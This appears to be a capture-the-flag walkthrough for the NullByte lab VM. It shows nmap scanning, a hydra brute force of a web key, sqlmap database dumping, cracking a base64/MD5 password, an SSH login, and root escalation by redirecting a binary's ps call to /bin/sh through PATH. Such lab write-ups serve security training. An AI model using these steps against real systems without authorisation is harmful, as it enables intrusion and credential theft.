Download VM here.
Run it on virtualbox, and let’s get started.
0. Get VM’s IP:
$ nmap -sn
our machine’s ip »
1. Enumeration:
Now we can continue to scan the machine and the running services.
- Using Zenmap (GUI nmap) :
$ nmap -T4 -A -v
As you can see there are :
- Apache server running on port 80
- rpcbind on port 111
- ssh on port 777
2. Web Enumeration:
let’s see the web app running on apache
let’s discover any directories using dirbuster » found nothing usefull
let’s inspect and check the picture in the page, maybe something hidden.
- download it :
it’s a gif
- download it :
command orexiftool
» got this stringkzMb5nVYJw
let’s try openning that string as a directory:
- got this page with login function and needs a key
From it’s source code it seems that the key isn’t that hard and we can brute force it
So let’s use hydra
for that job and you could use burpsuite’s intruder too.
usage : hydra -l <USER> -p <Password> <IP Address> http-post-form “<Login Page>:<Request Body>:<Error Message>”
$ hydra http-form-post "/kzMb5nVYJw/index.php:key=^PASS^:invalid key" -P /home/sehs/Desktop/stuff/rockyou.txt -la
we got the password » elite
Now let’s login and see
It’s a search function, by typing any letters or just enter » you get this:
3. Exploitation:
- let’s check this database and see what we could get, using sqlmap tool:
$ sqlmap -u --dbs
- let’s discover them:
- mysql
$ sqlmap -u --batch --dump -C User,Password -T user -D mysql
- seth
$ sqlmap -u --dump --columns --tables -D seth
ramses’ password looks interesting YzZkNmJkN2ViZjgwNmY0M2M3NmFjYzM2ODE3MDNiODE
- let’s decrypt it as base64 :
$ echo YzZkNmJkN2ViZjgwNmY0M2M3NmFjYzM2ODE3MDNiODE= | base64 -d
- we got this md5 hash :
cracking it online gives »omega
Getting back to the ssh service running
- let’s try this user and his password and see if it works
$ ssh ramses@ -p 777
- password: omega
- notice it’s runnig on port 777 not it’s default 22
And yeah we got a connection..
let’s see our privileges here » just a user not root
let’s roam into the system and see what we could find
we could read his bash history » and here he had executed this file procwatch
in this path /var/www/backup
- so let’s go there and see
- This file is just running ps command (process status) to display the running processes inside a shell (sh)..
- So we have an executable, that’s running ps as root and ps is really just a file in /bin, and $PATH sets the directories.
Where executables located:
Then we could manipulate this environment variables and get procwatch to run sh instead of ps, and this should give us a root shell :D
ramses@NullByte:/var/www/backup$ ln -snf /bin/sh ps
ramses@NullByte:/var/www/backup$ export PATH="/var/www/backup:$PATH"
This ln command creates a symlink to sh called ps followed by setting up the path to the current directory which gave us a shell :D
Got root access :) , opening /root/proof.txt » gave us the flag and we are done here…
- hope you enjoyed…